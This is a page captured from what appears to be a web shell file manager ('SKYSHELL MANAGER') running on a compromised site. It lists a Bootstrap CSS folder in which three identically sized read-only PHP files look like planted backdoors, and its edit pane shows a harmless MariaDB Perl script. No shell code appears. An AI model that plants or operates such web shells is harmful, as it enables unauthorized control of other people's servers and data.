📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuryempire.com
/
academy
/
assets
/
vendor
/
bootstrap
/
css
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
bootstrap-utilities.min.css.map
104.69 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.css
67.22 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.css.map
178.52 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.min.css
49.94 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.rtl.min.css.map
104.53 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.css
191.25 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.css.map
500.48 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.min.css
151.98 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.min.css.map
419.41 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.css
190.55 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.css.map
500.38 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap.rtl.min.css.map
617.97 KB
0644
🗑️
⬇️
✏️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
core.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
540.79 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.min.css
50.01 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.css
67.35 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-utilities.css.map
178.58 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.min.css
50.37 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.css
69.07 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.css.map
185.87 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.min.css
50.3 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.min.css.map
113.07 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.css
69.14 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.css.map
185.87 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-grid.rtl.min.css.map
113.15 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.min.css.map
39.26 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.css
5.74 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.css.map
96.73 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.min.css
4.56 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.min.css.map
33.12 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.css
5.72 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.css.map
96.74 KB
0644
🗑️
⬇️
✏️
🔒
📄
bootstrap-reboot.rtl.min.css
4.63 KB
0644
🗑️
⬇️
✏️
🔒
📄
system.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
Editing: mysql_fix_extensions
#!/usr/bin/perl # Copyright (c) 2001, 2017, Oracle and/or its affiliates. All rights reserved. # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU Library General Public # License as published by the Free Software Foundation; version 2 # of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Library General Public License for more details. # # You should have received a copy of the GNU Library General Public # License along with this library; if not, write to the Free # Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, # MA 02110-1335 USA # This is a utility for MariaDB. It is not needed by any standard part # of MariaDB. # Usage: mysql_fix_extensions datadir # does not work with RAID, with InnoDB or BDB tables # makes .frm lowercase and .MYI/MYD/ISM/ISD uppercase # useful when datafiles are copied from windows die "Usage: $0 datadir\n" unless -d $ARGV[0]; for $a (<$ARGV[0]/*/*.*>) { $_=$a; s/\.frm$/.frm/i; s/\.(is[md]|my[id])$/\U$&/i; rename ($a, $_) || warn "Cannot rename $a => $_ : $!"; }
💾 Save Changes